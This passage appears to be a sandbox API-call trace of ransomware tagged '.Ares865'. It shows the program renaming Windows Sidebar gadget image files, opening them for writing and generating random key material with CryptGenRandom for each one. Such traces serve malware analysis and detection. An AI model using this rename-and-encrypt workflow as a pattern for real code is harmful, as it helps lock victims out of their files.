sidebar\\gadgets\\slideshow.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.161] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10034) returned 1 [0117.161] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.161] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.161] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.164] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.164] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.Ares865") returned 80 [0117.165] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0117.167] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0117.167] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.168] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.168] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.170] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.171] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.171] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.171] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" [0117.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.Ares865") returned 88 [0117.172] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png.ares865"), dwFlags=0x1) returned 1 [0117.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.174] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3462) returned 1 [0117.174] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.175] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.175] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.178] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.179] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.179] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.Ares865") returned 92 [0117.179] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png.ares865"), dwFlags=0x1) returned 1 [0117.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3063) returned 1 [0117.182] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.182] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.182] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.188] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.189] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.189] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.189] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.Ares865") returned 91 [0117.189] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png.ares865"), dwFlags=0x1) returned 1 [0117.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3065) returned 1 [0117.191] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.192] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.192] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.195] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.195] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.195] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.196] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.Ares865") returned 92 [0117.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png.ares865"), dwFlags=0x1) returned 1 [0117.198] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.198] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2903) returned 1 [0117.198] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.199] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.199] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.202] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.202] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.Ares865") returned 93 [0117.203] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png.ares865"), dwFlags=0x1) returned 1 [0117.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3018) returned 1 [0117.204] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.205] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.205] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.208] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.208] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.208] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.Ares865") returned 92 [0117.209] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png.ares865"), dwFlags=0x1) returned 1 [0117.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3027) returned 1 [0117.211] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.212] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.212] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.214] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.215] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.215] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.216] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.Ares865") returned 93 [0117.216] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png.ares865"), dwFlags=0x1) returned 1 [0117.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.217] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2833) returned 1 [0117.217] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.218] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.218] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.220] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.221] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.221] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.222] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.Ares865") returned 92 [0117.222] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png.ares865"), dwFlags=0x1) returned 1 [0117.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3058) returned 1 [0117.224] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.225] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.225] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.227] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.228] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.228] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.228] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.Ares865") returned 91 [0117.228] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png.ares865"), dwFlags=0x1) returned 1 [0117.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3062) returned 1 [0117.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.230] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.231] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.234] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.234] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.234] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.Ares865") returned 92 [0117.235] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png.ares865"), dwFlags=0x1) returned 1 [0117.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2886) returned 1 [0117.237] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.238] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.238] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.240] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.241] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.241] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.242] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.Ares865") returned 92 [0117.242] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png.ares865"), dwFlags=0x1) returned 1 [0117.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.243] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3062) returned 1 [0117.243] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.244] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.244] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.247] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.248] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.248] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.248] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.Ares865") returned 91 [0117.248] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png.ares865"), dwFlags=0x1) returned 1 [0117.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3077) returned 1 [0117.253] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.253] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.253] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) 